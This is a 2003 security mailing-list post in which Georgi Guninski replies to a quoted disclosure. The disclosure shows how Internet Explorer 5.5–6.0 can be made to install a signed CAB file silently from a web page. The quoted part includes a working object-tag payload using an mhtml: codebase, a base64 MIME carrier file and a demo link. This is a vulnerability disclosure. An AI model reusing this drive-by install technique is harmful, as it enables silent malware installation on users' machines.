[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: guninski at guninski.com (Georgi Guninski)
Subject: SILLY BEHAVIOR Part III : Internet Explorer
5.5 - 6.0
Has the users at microsoft fixed reinstalling of bugware signed by them?
outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and
was quite signed.
IIRC at a time microsoft even wrote in a security bulletin: "remove us from the
trusted publishers in exploder" - has this changed, i.e. are they *now* claiming
they are a trusthworthy publisher again?
Georgi
http-equiv@...ite.com wrote:
> Sunday, May 4, 2003
>
>
> Silent delivery and installation of an executable on the target
> machine, default install of win98 and Internet Explorer with all
> patches to date. No client input other than viewing a web page:
>
> Mildly amused by the recent patching of the codebase saga spanning
> nearly 3 years now, we put on our thinking caps and come to the very
> simple, yet delicious conclusion:
>
> As below we are able to inject arbitrary html into the local computer
> zone thus bypassing the browser's security. Nevertheless the codebase
> exploits as detailed time and time again, now no longer function,
> returning the standard active x error or security warning.
>
> BUT !
>
> there is a very specific reason for that and to bypass it, we do like
> so:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555"
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and where our:
>
> ---wecerr.txt---
> MIME-Version: 1.0
> Content-Location:File://malware.cab
> Content-Transfer-Encoding: base64
>
> TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA
> AAAAAA
>
> ---wecerr.txt---
>
> contains a "signed" cab file. The digital signature is our key.
>
> Provided the executable is signed, we are again able to install via
> the codebase object, from the local machine and without any prompts
> or warnings. Certainly we would not expect malware to be digitally
> signed out in the wild, but for what it is worth, we are back in
> business.
>
> Working Example
>
> http://www.malware.com/aha.html
>
> Caution:
>
> a) for demonstration purposes we use the ubiquitous flash file [.cab
> file] as it is both signed and benign and you are able to visually
> see the install:
>
> [screen shot: http://www.malware.com/aha.png 14KB]
>
> b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can
> take a short while to download:
>
> [screen shot: http://www.malware.com/ah.png 4KB]
>
> once downloaded, simply take the:
>
> ----local.html----
>
> <object CLASSID="CLSID:55555555-5555"
> codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
> File://malware.cab">
>
> ----local.html----
>
> and away you go.
>
> Notes:
>
> 1. None
>
> End Call
>
Powered by blists - more mailing lists